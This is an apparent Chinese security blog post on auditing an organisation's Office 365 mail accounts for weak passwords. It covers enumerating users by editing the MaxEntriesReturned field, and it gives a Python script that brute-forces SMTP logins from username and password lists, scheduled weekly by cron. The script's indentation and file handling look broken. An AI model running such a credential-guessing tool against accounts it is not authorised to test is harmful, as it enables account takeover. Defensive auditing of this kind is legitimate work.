甲方安全建设之office365邮箱弱口令检测

信息收集

资产范围

资产列表总数是521

抓包后发现只有102

一番测试之后发现控制Response的关键在于MaxEntriesReturned字段，修改后Response达到了期望的结果

正则提取

开源中国在线正则表达式工具

python爆破脚本

import smtplib

import os

import time

# 获取当前时间以命名文件

def file_name():

	t = time.strftime('%Y-%m-%d',time.localtime())

	suffix = ".txt"

	fullname = t+suffix

	return fullname

# 使用smtp协议连接

def conn(u,p):

	s = smtplib.SMTP(host='smtp.office365.com', port=587)

	s.starttls()

	r = s.login(u,p)

	return r

def main():

    with open('/Users/markzhang/Desktop/user.txt','r') as user:

        with open('/Users/markzhang/Desktop/pass.txt','r') as password:

            users = user.readlines()

            passwords = password.readlines()

            for u in users:

                for p in passwords:

                    u = u.strip('\n')

                    p = p.strip('\n')

                    try:

                    	res = conn(u,p)

                    	#print res

                    	with open('/Users/markzhang/Documents/python/security/demo.txt','w') as f:

                    		#print os.getcwd()

                    		os.chdir('/Users/markzhang/Documents/python/security/')

                            #重命名，将正确结果写入文件

                    		os.rename('demo.txt',file_name())

                    		if res[0] == 235:

								f.write(u)

								f.write('/')

								f.write(p)

								f.write('\n')

							#os.chdir('/Users/markzhang/Documents/python/security/')

							#os.rename('demo.txt',file_name())

                    except Exception as e:

                    	print 'wrong account/pass',u,'/',p,e

if __name__ == '__main__':

	main()

添加定时任务

crontab -e添加内容如下，每周四的12:30执行

30 12 * * 4 cd /Users/markzhang/Documents/python/security/;python outlook.py